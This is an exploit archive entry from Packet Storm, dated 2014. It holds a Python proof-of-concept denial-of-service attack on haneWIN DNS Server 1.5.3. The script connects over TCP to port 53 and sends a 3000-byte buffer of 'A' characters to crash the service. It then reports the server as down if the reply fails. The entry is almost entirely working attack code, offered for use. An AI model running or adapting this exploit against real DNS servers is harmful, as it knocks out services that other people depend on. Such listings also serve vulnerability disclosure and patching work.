haneWIN DNS Server 1.5.3 Denial Of Service

2014-01-17T00:00:00
ID PACKETSTORM:124827
Type packetstorm
Reporter sajith
Modified 2014-01-17T00:00:00

Description

                                        
                                            `###########################################################  
[~] Exploit Title: haneWIN DNS Server 1.5.3 - Denial of service  
[~] Author: sajith  
[~] version: haneWIN DNS Server 1.5.3  
[~]Vendor Homepage: http://www.hanewin.net/  
[~] vulnerable app link:http://www.hanewin.net/dns-e.htm  
[~]Tested in windows Xp sp3  
###########################################################  
#POC by sajith shetty  
import socket  
  
target = "127.0.0.1"  
port = 53  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target, port))  
buf = "A" * 3000  
request = buf  
s.send(request)  
data = s.recv(1024)  
print data  
  
except:  
  
print "DNS server is Down!"  
  
`